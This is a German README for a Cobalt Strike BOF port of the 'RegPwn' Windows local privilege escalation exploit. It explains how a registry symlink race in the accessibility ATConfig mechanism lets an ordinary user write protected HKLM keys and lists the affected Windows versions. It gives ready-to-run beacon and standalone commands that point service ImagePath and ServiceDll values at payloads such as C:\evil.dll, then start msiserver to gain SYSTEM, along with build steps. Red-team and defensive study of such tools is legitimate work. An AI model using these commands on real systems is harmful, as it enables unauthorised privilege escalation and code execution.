
Bof von RegPwn von MDSec
Cobalt Strike BOF-Port des RegPwn-Exploits von Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.
Dies ist eine schlampige BOF-Neuimplementierung des ursprünglichen C#-Exploits. Die gesamte Anerkennung für die Schwachstellenforschung und den Exploit geht an Filip Dragovic und MDSec.
Nutzt eine Registry-Symlink-Race-Condition im Windows-Bedienungshilfen-ATConfig-Mechanismus aus, um aus einem normalen Benutzerkontext heraus beliebige Werte in geschützte HKLM-Registry-Schlüssel zu schreiben (Lokale Privilegienausweitung).
Zielt auf Windows 11 25H2/24H2, Windows 10 21H2 und Windows Server 2016/2019/2022 vor dem Patch vom März 2026.
WARNUNG: Dieser Exploit sperrt die Workstation als Teil der Race-Condition.
Der msiserver-Dienst (Windows Installer) mit dem ImagePath. Dieser Dienst läuft als SYSTEM und kann von normalen Benutzern gestartet werden.
Laden Sie regpwn.cna im Skript-Manager, dann:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
Nachdem der Exploit erfolgreich war, starten Sie den Dienst, um als SYSTEM ausgeführt zu werden:
net start msiserver
Erfordert x86_64-w64-mingw32-gcc (MinGW-w64 Cross-Compiler).
make # build BOF (regpwn.x64.o)
make test # build standalone EXE (regpwn.x64.exe)
make clean
Nur x64.